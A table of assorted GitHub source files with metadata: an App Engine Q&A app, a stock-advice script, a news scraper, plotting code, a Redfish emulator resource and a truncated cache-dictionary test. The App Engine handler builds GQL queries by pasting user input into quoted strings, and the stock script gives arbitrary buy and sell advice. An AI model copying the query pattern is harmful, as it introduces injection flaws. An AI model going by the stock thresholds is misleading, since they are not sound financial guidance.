| blob_id (string, len 40) | directory_id (string, len 40) | path (string, len 2-616) | content_id (string, len 40) | detected_licenses (list, len 0-69) | license_type (string, 2 classes) | repo_name (string, len 5-118) | snapshot_id (string, len 40) | revision_id (string, len 40) | branch_name (string, len 4-63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k-686M, nullable) | star_events_count (int64, 0-209k) | fork_events_count (int64, 0-110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (string, 213 classes) | src_encoding (string, 30 classes) | language (string, 1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2-10.3M) | extension (string, 246 classes) | content (string, len 2-10.3M) | authors (list, len 1) | author_id (string, len 0-212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
22fab3bbf030b5a3ee3da3004cce910e674b303c
|
28ea6fff3662fbc52fe349ca8d647b5b5fe268a5
|
/src/helloworld.py
|
7961f6eb5b2d904d09496fd4465b0879741044f8
|
[] |
no_license
|
shivarajp/PopTheQuery
|
bbc13363005853d36d41701aeaf1b716d4e22776
|
9c1caa9696488a64dce9aa5a48b786c80773ead9
|
refs/heads/master
| 2021-01-19T05:47:06.126672
| 2014-09-27T14:12:25
| 2014-09-27T14:12:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,627
|
py
|
import wsgiref.handlers
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext import db
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
title = ''  # module-level default so /reply works before any question has been selected
class Register(db.Model):
    section = db.StringProperty(required=True)
    qtn = db.StringProperty(required=True)
class visitors(db.Model):
    Name = db.StringProperty(required=True)
    Email = db.StringProperty(required=True)
class comments(db.Model):
    title = db.StringProperty(required=True)
    comment = db.StringProperty(required=True)
class MainPage(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
greeting = ('Welcome, %s! (<a href="%s">sign out</a>)' %
(user.nickname(), users.create_logout_url('/')))
else:
greeting = ('<a href="%s">SIGN IN WITH GOOGLE ACCOUNT :)</a>.' %
users.create_login_url('/'))
self.response.out.write('<html><body>%s</body></html>' % greeting)
class Homepage(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('index.html',{}))
class register(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('raisequestion.html',{}))
def post(self):
shoutt= Register(section=self.request.get('txt1'),qtn=self.request.get('qtn'))
shoutt.put()
self.response.out.write(template.render('raisequestion.html',{}))
class popthequery(webapp.RequestHandler):
def get(self):
shouts= db.GqlQuery('select * from Register')
values={'shouts':shouts}
self.response.out.write(template.render('popthequery.html',values))
def post(self):
global title
title=self.request.get('quest')
self.redirect("/reply")
class raisequestion(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('raisequestion.html',{}))
def post(self):
self.response.out.write(template.render('raisequestion.html',{}))
class display(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('display.html',{}))
class aboutus(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('aboutus.html',{}))
class contactus(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('contactus.html',{}))
class reply(webapp.RequestHandler):
def get(self):
shouts= db.GqlQuery("select * from comments where title = '%s'" % title)
sh1=db.GqlQuery("select * from Register where section = '%s'" % title)
values={'shouts':shouts,'sh1':sh1}
self.response.out.write(template.render('reply.html',values))
def post(self):
shoutt= comments(title=self.request.get('ques'),comment=self.request.get('qtn'))
shoutt.put()
self.response.out.write(template.render('index.html',{}))
application = webapp.WSGIApplication([('/', Homepage),('/MainPage', MainPage),('/register', register),('/popthequery',popthequery),('/reply', reply),('/aboutus', aboutus),('/contactus', contactus)], debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
|
[
"shivrajp130@gmail.com"
] |
shivrajp130@gmail.com
|
20b411857018d423476fddd690fa0329d50115f5
|
e851ab438384ca775cff31633f2974abf98f581b
|
/app/robo_advisor.py
|
1a2a868218094423af3f41266bc36b675f3a7b38
|
[] |
no_license
|
melissawelty/robo-advisor
|
7c7c8282c912ac174cda48c0c3b1ffce04890edb
|
febc41ce0c4695def1712adc3929ae0639357cec
|
refs/heads/master
| 2022-11-06T21:41:03.952316
| 2020-06-25T21:09:12
| 2020-06-25T21:09:12
| 270,390,612
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,601
|
py
|
# app/robo_advisor.py
import csv
import json
import os
from dotenv import load_dotenv
import requests
from datetime import datetime
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
load_dotenv()
def to_usd(my_price):
# return "${0:,.2f}".format(my_price)
return f"${my_price:,.2f}"
# INPUTS
api_key = os.environ.get("ALPHAVANTAGE_API_KEY")
symbol = input("Please enter a stock symbol and press enter:")
request_url = f"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol={symbol}&apikey={api_key}"
response = requests.get(request_url)
if 'Error' in response.text:
print("Invalid Symbol. Please enter valid stock symbol.")
exit()
parsed_response = json.loads(response.text)
last_refreshed = parsed_response["Meta Data"]["3. Last Refreshed"]
tsd = parsed_response["Time Series (Daily)"]
dates = sorted(tsd.keys(), reverse=True)  # sort descending so the latest day really is first, instead of assuming API order
latest_day = dates[0]
latest_close = tsd[latest_day]["4. close"]
#max of all high prices
high_prices = []
low_prices = []
for date in dates:
high_price = tsd[date]["2. high"]
low_price = tsd[date]["3. low"]
high_prices.append(float(high_price))
low_prices.append(float(low_price))
recent_high = max(high_prices)
recent_low = min(low_prices)
# OUTPUTS
csv_filepath = os.path.join(os.path.dirname(__file__), "..", "data", "prices.csv")
csv_headers = ["timestamp", "open", "high", "low", "close", "volume"]
with open(csv_filepath, "w", newline="") as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=csv_headers)
writer.writeheader()
for date in dates:
daily_prices = tsd[date]
writer.writerow({
"timestamp": date,
"open": daily_prices["1. open"],
"high": daily_prices["2. high"],
"low": daily_prices["3. low"],
"close": daily_prices["4. close"],
"volume": daily_prices["5. volume"]
})
print("-------------------------")
print(f"SELECTED SYMBOL: {symbol}")
print("-------------------------")
print("REQUESTING STOCK MARKET DATA...")
now = datetime.now()
date_time = now.strftime("%D, %r")
print("REQUEST AT:" + date_time)
print("-------------------------")
print(f"LATEST DAY: {last_refreshed}")
print(f"LATEST CLOSE: {to_usd(float(latest_close))}")
print(f"RECENT HIGH: {to_usd(float(recent_high))}")
print(f"RECENT LOW: {to_usd(float(recent_low))}")
print("-------------------------")
if float(latest_close) > (float(recent_high) * .75):
print("RECOMMENDATION: DON'T BUY! The stock price is too high and not a good investment.")
elif float(latest_close) < (float(recent_low) * 1.15):
print("RECOMMENDATION: BUY AND HOLD! The price is low and could generate high returns when it increases!")
else:
print("RECOMMENDATION: DON'T BUY! Keep watching, this could be a potential buy soon..")
print("-------------------------")
print(f"WRITING DATA TO CSV: {csv_filepath}...")
print("-------------------------")
print("HAPPY INVESTING!")
print("-------------------------")
x = []
y = []
with open(csv_filepath, 'r') as csvfile:
rows=csv.reader(csvfile, delimiter=",")
next(rows)
for row in rows:
x.append(row[0])
y.append(float(row[4]))
plt.figure(figsize = (15,6))
plt.plot(x,y,marker='o')
plt.title('Data from Prices')
plt.xlabel('Date')
plt.xticks(rotation=45)
plt.ylabel('Price in USD')
ax = plt.gca()
# date_form = DateFormatter("%m-%d")
# ax.xaxis.set_major_formatter(date_form)
ax.invert_xaxis()
plt.show()
|
[
"65548626+melissawelty@users.noreply.github.com"
] |
65548626+melissawelty@users.noreply.github.com
|
a45c45ce54e0b683e4ef570b1e30e63d1106162e
|
94c6c148450cdfc85ff3957c9fc9af6d960ed038
|
/cron_jobs/archery_org_hk_spider.py
|
61d8922e04fe5fbdc34b71b196cccf88615d08ac
|
[] |
no_license
|
samwalker505/archery_news
|
d4fba46de6da1e43672770beaf7530a021d34d27
|
2caa29ad9bc2119913c2e85093593e62ce62b2ae
|
refs/heads/master
| 2021-01-11T18:36:03.311848
| 2017-01-30T14:05:14
| 2017-01-30T14:05:14
| 79,579,959
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,446
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import md5
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
import webapp2
import logging
from lxml import etree
from handlers import BaseHandler, Output
from models.post import ArcheryOrgHkPost
from external_api.facebook import Facebook as FacebookApi
class ArcheryOrgHkSpiderHandler(BaseHandler):
def create_post(self, post, client):
post_content = []
title = post.title or ''
        content = (post.content or '').replace('\n', '%0A')  # guard first: post.content may be None, and None.replace would raise
tag_arr = [u'%23{}'.format(tag) for tag in post.tags]
tags = u'%20'.join(tag_arr)
if title:
post_content.append(title)
if content:
post_content.append(content)
if tags:
post_content.append(tags)
post_fb_content = u'%0A'.join(post_content)
logging.debug('entered')
logging.debug(post_fb_content)
link = '{}/archery_org_hk?post_id={}'.format(self.request.host_url, post.key.id())
result = client.create_post(post_fb_content, link)
@Output.json
def get(self, *args, **kwargs):
pageNum = 0
url_format = 'https://www.archery.org.hk/frontpage?page={}'
url = url_format.format(pageNum)
results = []
while url:
get_result = urlfetch.fetch(url)
page = etree.HTML(get_result.content)
for row in page.xpath('//div[contains(@class, "views-row")]'):
title = row.xpath('descendant::h2/a/text()')[0]
url = row.xpath('descendant::h2/a/@href')[0]
tags = row.xpath('descendant::div[@class="terms"]//text()')
tags = [tag for tag in tags if tag != '\n']
contentRaw = row.xpath('descendant::div[contains(@class, "content")]//text()')
content = u''.join(contentRaw) if contentRaw else u''
content = re.sub(r' +', u' ', content)
content = re.sub(r'(\n ?)+', u'\n', content)
content = content.strip()
content = content.encode('utf-8')
result = {
'title': title,
'url': url,
'tags': tags,
'content': content,
'content_hash': md5.new(content).hexdigest(),
'url_hash':md5.new(url).hexdigest(),
}
results.append(result)
if page.xpath('//li[contains(@class, "pager-last")]'):
pageNum += 1
url = url_format.format(pageNum)
else:
url = None
logging.debug('done fetching')
result_ids = ['{}:{}'.format(r['url_hash'], r['content_hash']) for r in results]
keys = [ndb.Key(ArcheryOrgHkPost, str(rid)) for rid in result_ids]
created_posts = ndb.get_multi(keys)
to_create = [r for r, p in zip(results, created_posts) if not p]
if to_create:
created_post_keys = ArcheryOrgHkPost.create_from_spider_batch(to_create)
            created_posts = ndb.get_multi(created_post_keys)  # get_multi, not ndb.get, is the call that fetches a list of keys
client = FacebookApi()
for post in created_posts:
self.create_post(post, client)
else:
logging.debug('no to create')
return {}
app = webapp2.WSGIApplication([
(r'/api/v1/cron_jobs/archery_org_hk_spider', ArcheryOrgHkSpiderHandler),
])
|
[
"samwalker505@gmail.com"
] |
samwalker505@gmail.com
|
510df31dcea0e95031d017d93c8fd93e7231355f
|
af3904eecec7e41fcb530213b6e6c9f8d4c12c08
|
/flask010/bin/flask
|
a42ec0ab16bb3b87ff2b9c59f25ce4ffdbaecfd8
|
[] |
no_license
|
Besom01/homeworks
|
076232963e8c05e2eabc6183ec13061465afb8be
|
77c739b4b30819d9a369a24edc5b67de5920ad50
|
refs/heads/master
| 2021-06-19T23:23:41.914326
| 2019-08-07T11:03:50
| 2019-08-07T11:03:50
| 196,199,449
| 0
| 0
| null | 2021-03-20T05:14:30
| 2019-07-10T12:15:48
|
Python
|
UTF-8
|
Python
| false
| false
| 247
|
#!/home/danger/Desktop/pyprojects/flask010/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ganjubasman007@gmail.com"
] |
ganjubasman007@gmail.com
|
|
317cc5c1fca1faac48fbd217fee8bfa5624b2b88
|
29310445b330844d734f38147d1e2b91d2610bc9
|
/OOP_Pre/codeup/1031.py
|
8d4f40ce5b0d352da17b5431f7a64c6bf722e431
|
[] |
no_license
|
itsss/vacation_2018-1
|
1bbfd67a169db3d9f9b6aefe604d9131dd8fdeb3
|
500a37a90617820628c44d0c5fbe0c5c200ac0d0
|
refs/heads/master
| 2020-03-24T00:14:24.123319
| 2018-08-14T04:35:40
| 2018-08-14T04:35:40
| 142,281,181
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
#a = int(input())
#print(int(oct(a)[2:].zfill(2)))
#a = int(input())
#print(hex(a)[2:])
#a = int(input())
#print("%X" % (a))
#a = input()
#print(int(a, 8))
a = input()
b = int(a, 16)
print("{0:o}".format(b))
|
[
"itschool@itsc.kr"
] |
itschool@itsc.kr
|
af8be67c9523b7c72402ebfb98233114ede9d5e6
|
6e155ed62ef6d24cb1219d086a7d695abc283bc0
|
/plugins/wascan/parse_wascan.py
|
78f2c502a2d437d6d71f160b1ab22faa5b7e8981
|
[] |
no_license
|
linpengstc/pentest
|
9c928ab2d62a406ca79db80818d8f668dcdf751c
|
f4e94141f740aedc6417f52488a0f1b2f4864174
|
refs/heads/master
| 2020-03-10T05:54:29.668808
| 2018-04-13T03:42:17
| 2018-04-13T03:42:17
| 129,227,530
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
import pprint
import sqlite3
def parse_result():
results = []
with open("out/wascan/wascan.result") as f:
r = {}
for l in f:
l = l.strip()
if l.startswith("[+] URL:"):
if r != {}:
results.append(r)
r = {}
r['url'] = l.replace("[+] URL:", "").strip()
r['info'] = []
else:
r['info'].append(l)
        if r != {}:
            results.append(r)  # flush the final record once the file is exhausted
pprint.pprint(results)
return results
def save(datas):
conn = sqlite3.connect("report/data.db")
cur = conn.cursor()
cur.execute('DROP TABLE IF EXISTS webinfo')
cur.execute("create table webinfo (url varchar(100), info varchar(10000))")
for d in datas:
cur.execute("insert into webinfo(url, info) values(?,?)", (d['url'], "\n".join(d['info'])))
conn.commit()
conn.close()
if __name__ == "__main__":
results = parse_result()
save(results)
|
[
"linpeng@weidian.com"
] |
linpeng@weidian.com
|
a1d17058046e65d78f34d700c70b3d7e984347cf
|
25e0d42a524ac20fbda7355ac4825f3510eb2f0c
|
/all/130/final_routes/special/PlotSiTensor
|
0c4e200c4e9504a7d721e48ffeca50f1a6f54851
|
[] |
no_license
|
lucydot/data
|
d3f1fa7645f3eb32b2cddbdf78c382a964533f06
|
08bd49bbf768cf867dce0bf8393c25b9583b9723
|
refs/heads/master
| 2021-01-10T22:53:59.672517
| 2016-10-11T09:44:41
| 2016-10-11T09:44:41
| 70,342,058
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,088
|
#!/usr/bin/env python
# region: Imports
import csv;
import math;
import os;
import numpy as np;
import matplotlib as mpl;
import matplotlib.pyplot as plt;
import matplotlib.ticker as tck;
from scipy.interpolate import splrep, splev
#EndRegion
#Region:Parameters
InputFiles = [
("./", "OUTCAR"),
]; # This code allows multiple files to be read in.
# Each file read in will have a different colour band structure.
OutputFileName = "Si_Tensor_LDA_0.005_130_special.png";
BandPaths = [
[
## FCC cubic lattice
# ((0.0, 0.0, 0.0), r"$\Gamma$"),
# ((0.5, 0.0, 0.5), "X"),
# ((0.5, 0.25, 0.75), "W"),
# ((0.375, 0.375, 0.75), "K"),
# ((0.0, 0.0, 0.0), r"$\Gamma$"),
# ((0.5, 0.5, 0.5), "L"),
# ((0.625, 0.25, 0.625), "U"),
# ((0.5, 0.25, 0.75), "W"),
# ((0.5, 0.5, 0.5), "L"),
# ((0.625, 0.625, 0.75), "K")
## Tetragonal lattice
# ((0.0, 0.0, 0.0), r"$\Gamma$"),
# ((0.0, 0.5, 0.00), "X"),
# ((0.5, 0.5, 0.0), "M"),
# ((0.0, 0.0, 0.0), r"$\Gamma$"),
# ((0.0,0.0,0.5), "Z"),
# ((0.0,0.5,0.5), "R"),
# ((0.5,0.5,0.5), "A"),
# ((0.0,0.0,0.5),"Z")
## Simple cubic
((0.484, 0.0, 0.484), "0.484,0,0.484"),
((0.484, 0.5, 0.484), "0.484,0.5,0.484")
],
# [
# ((0.625, 0.250, 0.625), "U"),
# ((0.500, 0.000, 0.500), "X")
# ]
];
ReciprocalLatticeVectors = [
(1.1569113, 1.1569113, 1.1569113),
(1.1569113, -1.1569113, -1.1569113),
(-1.1569113, 1.1569113, -1.1569113),
];
UseInterpolation = False; #This uses a scipy routine to interpolate between k-points
Colors = [(0, 0, 255), (128, 0, 255), (255, 0, 255), (255, 0, 128), (255, 0, 0), (255, 128, 0)]
# If only one file being plotted, amend first entry to change colour of plot
#EndRegion
#Region: Functions
def _ReadBandEnergies(filePath):
bandEnergies = [];
inputReader = open(filePath, 'rU');
inputReaderCSV = csv.reader(inputReader);
next(inputReaderCSV);
next(inputReaderCSV);
for row in inputReaderCSV:
bandEnergies.append([float(row[i]) for i in range(1, len(row), 2)]);
inputReader.close();
return bandEnergies;
def _ReadKPoints(filePath):
kPointCoordinates = [];
inputReader = open(filePath, 'rU');
inputReaderCSV = csv.reader(inputReader);
next(inputReaderCSV);
for row in inputReaderCSV:
kPointCoordinates.append((float(row[1]), float(row[2]), float(row[3])));
inputReader.close();
return kPointCoordinates;
#EndRegion
#Region: Main
#COMMENT: Unpack the reciprocal lattice vectors - used in the next two subsections.
(r1X, r1Y, r1Z), (r2X, r2Y, r2Z), (r3X, r3Y, r3Z) = ReciprocalLatticeVectors;
#COMMENT: Prepare the x-axis ticks positions and labels.
specialPointDistances = [0.0];
specialPointLabels = [];
for bandPath in BandPaths:
for i in range(1, len(bandPath)):
(kx1, ky1, kz1), label1 = bandPath[i - 1];
(kx2, ky2, kz2), label2 = bandPath[i];
kDistanceX = (kx2 * r1X + ky2 * r2X + kz2 * r3X) - (kx1 * r1X + ky1 * r2X + kz1 * r3X);
kDistanceY = (kx2 * r1Y + ky2 * r2Y + kz2 * r3Y) - (kx1 * r1Y + ky1 * r2Y + kz1 * r3Y);
kDistanceZ = (kx2 * r1Z + ky2 * r2Z + kz2 * r3Z) - (kx1 * r1Z + ky1 * r2Z + kz1 * r3Z);
pathLength = math.sqrt(kDistanceX ** 2 + kDistanceY ** 2 + kDistanceZ ** 2);
specialPointDistances.append(specialPointDistances[-1] + pathLength);
if i == 1:
if len(specialPointLabels) == 0:
specialPointLabels.append(label1);
specialPointLabels.append(label2);
else:
specialPointLabels[-1] = specialPointLabels[-1] + "|" + label1;
specialPointLabels.append(label2);
else:
specialPointLabels.append(label2);
#COMMENT: Prepare sets of data for plotting.
plotSets = [];
for i in range(0, len(InputFiles)):
basePath, prefix = InputFiles[i];
kPoints = _ReadKPoints(os.path.join(basePath, "{0} - K-Points.csv".format(prefix)));
bandEnergies = _ReadBandEnergies(os.path.join(basePath, "{0} - Band Energies.csv".format(prefix)));
kPointDistances = [0.0];
for j in range(1, len(kPoints)):
kx1, ky1, kz1 = kPoints[j - 1];
kx2, ky2, kz2 = kPoints[j];
kDistanceX = (kx2 * r1X + ky2 * r2X + kz2 * r3X) - (kx1 * r1X + ky1 * r2X + kz1 * r3X);
kDistanceY = (kx2 * r1Y + ky2 * r2Y + kz2 * r3Y) - (kx1 * r1Y + ky1 * r2Y + kz1 * r3Y);
kDistanceZ = (kx2 * r1Z + ky2 * r2Z + kz2 * r3Z) - (kx1 * r1Z + ky1 * r2Z + kz1 * r3Z);
pathLength = math.sqrt(kDistanceX ** 2 + kDistanceY ** 2 + kDistanceZ ** 2);
kPointDistances.append(kPointDistances[-1] + pathLength);
interpolatedKPointDistances = None;
interpolatedBandEnergies = None;
if UseInterpolation:
interpolatedKPointDistances = np.linspace(specialPointDistances[0], specialPointDistances[-1], len(kPointDistances) * 10);
interpolatedBandEnergies = [];
for band in bandEnergies:
tck = splrep(kPointDistances, band);
interpolatedBandEnergies.append(splev(interpolatedKPointDistances, tck));
plotSets.append((kPointDistances, bandEnergies, interpolatedKPointDistances, interpolatedBandEnergies));
#COMMENT: Plot and save the data.
mpl.rc('font', **{ 'family' : 'serif', 'size' : 14, 'serif' : 'Arial' });
plt.figure(figsize = (12/ 2.54, 12 / 2.54)); #2.54 cm in an inch - matplotlib uses inches
for i in range(0, len(plotSets)):
kPointDistances, bandEnergies, interpolatedKPointDistances, interpolatedBandEnergies = plotSets[i];
r, g, b = Colors[i];
    if interpolatedKPointDistances is not None:
for j in range(0, len(bandEnergies)):
# plt.scatter(kPointDistances, bandEnergies[j], 3, facecolor = 'none', edgecolor = (r / 255.0, g / 255.0, b / 255.0), linewidth = 0.5);
plt.plot(interpolatedKPointDistances, interpolatedBandEnergies[j], color = (r / 255.0, g / 255.0, b / 255.0), linewidth = 1.0);
else:
for band in bandEnergies:
            plt.plot(kPointDistances, band, color = (r / 255.0, g / 255.0, b / 255.0), linewidth = 1.0);
#matplotlib likes rgb colors as a decimal
plt.xlim((specialPointDistances[0], specialPointDistances[-1]));
plt.ylim((-5, 5)); # change to plot over larger energy interval
plt.xticks(specialPointDistances, specialPointLabels);
plt.yticks([-5.0, -2.5, 0, 2.5, 5]);
plt.xlabel("Wave vector k") #
plt.ylabel ("Energy (eV)") # you can use latex (r"$\mathit{E - E_F}$ / eV")
# plt.title ("CZTS hybrid", fontweight = 'bold')
axes = plt.gca();
axes.get_xaxis().set_tick_params(**{ 'direction' : 'outward', 'top' : 'off'});
axes.get_yaxis().set_tick_params(**{ 'direction' : 'outward', 'right' : 'off'});
axes.get_xaxis().set_tick_params(width = 0.5);
axes.get_yaxis().set_tick_params(width = 0.5);
axes.get_xaxis().grid(color = (211 / 255.0, 211 / 255.0, 211 / 255.0), linestyle = '-', linewidth = 0.5);
# axes.get_yaxis().set_major_formatter(tck.FuncFormatter(lambda value, pos : "{0:.1f}".format(value)));
axes.set_axisbelow(True);
for spine in axes.spines.values():
spine.set_linewidth(0.5);
plt.tight_layout();
plt.savefig(OutputFileName, format = 'png', dpi = 300);
plt.close();
#EndRegion
|
[
"l.whalley@bath.ac.uk"
] |
l.whalley@bath.ac.uk
|
|
7cf14a1904b17c4284ccaf9831aad5334765dde3
|
07d70fa9dc518ef4c7f4d0065ab47b930ef64a05
|
/api_emulator/redfish/memory.py
|
9d49d3a3e1ceccddafc2d5296ec283fd9c5b1cfb
|
[
"BSD-3-Clause"
] |
permissive
|
fetahi/Redfish-Interface-Emulator-1
|
ed5dd0c5a0d8ef820204497e4a99cc38694690e2
|
d89b9a313b6ea6acc85038123fcbe91cf6cf99a0
|
refs/heads/master
| 2021-07-13T02:33:47.331169
| 2017-10-11T15:04:33
| 2017-10-11T15:04:33
| 103,956,434
| 0
| 0
| null | 2017-09-18T15:21:40
| 2017-09-18T15:21:40
| null |
UTF-8
|
Python
| false
| false
| 2,081
|
py
|
# Copyright Notice:
# Copyright 2016 Distributed Management Task Force, Inc. All rights reserved.
# License: BSD 3-Clause License. For full text see link: https://github.com/DMTF/Redfish-Interface-Emulator/LICENSE.md
# Redfish Memory and Memory Resources. Based on version 1.0.0
from flask_restful import Resource
import logging
from .templates.memory import format_memory_template
members = {}
INTERNAL_ERROR = 500
class Memory(Resource):
"""
Memory.1.0.2.Memory
"""
def __init__(self, **kwargs):
pass
def get(self, ident1, ident2):
resp = 404
if ident1 not in members:
return 'not found',404
if ident2 not in members[ident1]:
return 'not found',404
return members[ident1][ident2], 200
class MemoryCollection(Resource):
"""
Memory.1.0.2.MemoryCollection
"""
def __init__(self, rb, suffix):
"""
        MemoryCollection constructor
"""
self.config = {u'@odata.context': '{rb}$metadata#MemoryCollection.MemoryCollection'.format(rb=rb),
u'@odata.id': '{rb}{suffix}'.format(rb=rb, suffix=suffix),
u'@odata.type': u'#MemoryCollection.MemoryCollection'}
def get(self, ident):
try:
if ident not in members:
return 404
procs = []
for p in members.get(ident, {}).values():
procs.append({'@odata.id': p['@odata.id']})
self.config['@odata.id']='{prefix}/{ident}/Memory'.format(prefix=self.config['@odata.id'],ident=ident)
self.config['Members'] = procs
self.config['Members@odata.count'] = len(procs)
resp = self.config, 200
        except Exception as e:  # "except Exception, e" is Python 2-only syntax; "as e" works on both 2 and 3
logging.error(e)
resp = 'internal error', INTERNAL_ERROR
return resp
def CreateMemory(**kwargs):
suffix_id = kwargs['suffix_id']
memory_id = kwargs['memory_id']
if suffix_id not in members:
members[suffix_id] = {}
members[suffix_id][memory_id] = format_memory_template(**kwargs)
|
[
"fetahi.wuhib@ericsson.com"
] |
fetahi.wuhib@ericsson.com
|
26f054cc7b5e9732066581e3f243a6f48aaa449f
|
9172ea51864ae8a44631430d5044b14adad94e56
|
/src/problem_001.py
|
1bfa1d86e5bb8c7b2277f887a625730f7e636d79
|
[] |
no_license
|
ShZgZ/MyProjectEuler
|
6cb20e3a8ed8d842cad2b9664b96eeddde48acae
|
8853ab89591be1975e82e47a821a49d1ea469e53
|
refs/heads/master
| 2022-10-22T09:29:57.253819
| 2020-06-08T10:42:06
| 2020-06-08T10:42:06
| 268,762,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,186
|
py
|
"""Multiples of 3 and 5
If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000.
Japanese note (translated): Multiples of 3 and 5.
For the natural numbers below 10 that are multiples of 3 or 5 (3, 5, 6 and 9), the sum of these multiples is 23.
Find the sum of all multiples of 3 or 5 below 1000.
"""
import doctest
def main():
"""
    Find the sum of the multiples of 3 and 5 below 1000.
"""
below_num = 1000
n0 = 3
n1 = 5
result = get_multiples_sum(n0, n1, below_num=below_num)
print(result)
def get_multiples_sum(*numbers: int, below_num: int) -> int:
"""
    Sum the natural numbers below below_num that are multiples of any of the given numbers.
    :param numbers: the numbers whose multiples are counted
    :param below_num: the exclusive upper bound
    :return: the sum of the multiples
>>> get_multiples_sum(3, 5, below_num=10)
23
"""
count = 0
for i in range(1, below_num):
for j in numbers:
if i % j == 0:
count += i
break
return count
if __name__ == '__main__':
doctest.testmod()
main() # 233168
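The nested loop above is O(below_num); for two divisors the same answer also follows in O(1) from inclusion-exclusion over arithmetic series. A minimal sketch (the helper name is ours, not part of the original module):

```python
def multiples_sum_closed_form(below_num: int) -> int:
    """Sum of multiples of 3 or 5 below below_num, via inclusion-exclusion."""
    def series(k: int) -> int:
        # k + 2k + ... + mk with mk < below_num equals k * m * (m + 1) / 2
        m = (below_num - 1) // k
        return k * m * (m + 1) // 2
    # count multiples of 3 and of 5 once, then remove the double-counted multiples of 15
    return series(3) + series(5) - series(15)

assert multiples_sum_closed_form(1000) == 233168  # matches main()'s output
```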
|
[
"s.shogo.z89@gmail.com"
] |
s.shogo.z89@gmail.com
|
0323f4528a16c0cda897844c311d5d144cd8dbcb
|
0bf0ed0b69d2a3cbdb9dad664aea6b2c597b5af8
|
/Weather.py
|
93e10beda5d5945918bee5098e04c794ae0ca4a9
|
[] |
no_license
|
Vivianwcao/Lab_1
|
557aa597bb569eca73338b409027f961ebb83254
|
5e9336ebf20544fe477e3aca463f9139a7747b98
|
refs/heads/master
| 2020-12-07T14:18:08.829958
| 2020-01-09T18:56:59
| 2020-01-09T18:56:59
| 232,736,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
celsius = 10
fahrenheit = 9/5 * celsius + 32
print("Temperature: " + str(celsius) + " degrees Celsius")
print("Temperature: " + str(fahrenheit) + " degrees Fahrenheit")
|
[
"vivian.w.cao@gmail.com"
] |
vivian.w.cao@gmail.com
|
438c876dfe378cf28adc2d88b1096189e1a9c26b
|
52a1ccbc8147cce7ddaf808e1fc260b76dc4a3e0
|
/test/test_cdbdict.py
|
3ac85b0c78c674c8a3628fb9aa8dc66c5edd8f77
|
[] |
no_license
|
martinbudden/mediawiki2cdb
|
5073ddfe442ae55720737f16b63102c7dc40945e
|
828dd286850545ca8e0453a88f42b413b16b9868
|
refs/heads/master
| 2020-12-24T17:44:54.145353
| 2010-04-28T13:14:20
| 2010-04-28T13:14:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,906
|
py
|
"""
CDB dictionary test module.
"""
import unittest
import os
from mediawikicdb.cdbdict import CdbDict, CdbDictIntKey, CdbDictIntValue
#from mediawikicdb import CdbDict, CdbDictIntKey, CdbDictIntValue
class CDBDictTestCase(unittest.TestCase):
"""Basic test for cdbdict."""
def setUp(self):
"""Create directory for testing."""
self.dir = "testcdb/"
if not os.path.exists(self.dir):
os.makedirs(self.dir)
def tearDown(self):
"""No teardown required."""
pass
def test_pageCdbDict(self):
"""Test basic CdbDict functionality"""
filename = "testcdb/temp.cdb"
if os.path.exists(filename):
os.remove(filename)
d = CdbDict(filename)
# test __delitem__
try:
del d[0]
self.assertTrue(False)
except TypeError:
pass
# test __setitem__
try:
d[0] = 0
self.assertTrue(False)
except TypeError:
pass
# test iter
i = d.__iter__()
self.assertEqual(i, i.__iter__())
# test _pack_value and _unpack_value
expected = 'abcde'
result = d._unpack_value(d._pack_value(expected))
self.assertEqual(result, expected)
# test _pack_key and _unpack_key
expected = 'abcde'
result = d._unpack_key(d._pack_key(expected))
self.assertEqual(result, expected)
testPages = {'k1': 'v1', 'k2': 'v2', 'k3': 'v3'}
d.update(testPages)
self.assertEqual(len(d), len(testPages))
for i in testPages:
expected = testPages[i]
result = d[i]
print "i, e, r", i, expected, result
self.assertEqual(result, expected)
os.remove(filename)
def test_intKey(self):
"""Test dictionary with integer key"""
testPages = { \
290: 'A',
3783: 'B',
12266: 'Genetics',
3954: 'Biochemistry',
130495: 'EBay',
6235: 'Cell nucleus',
5507057: 'Deoxyribonuclease I',
7955: 'DNA'}
pageIntFromName = CdbDictIntKey(self.dir + "pageIntKey.cdb")
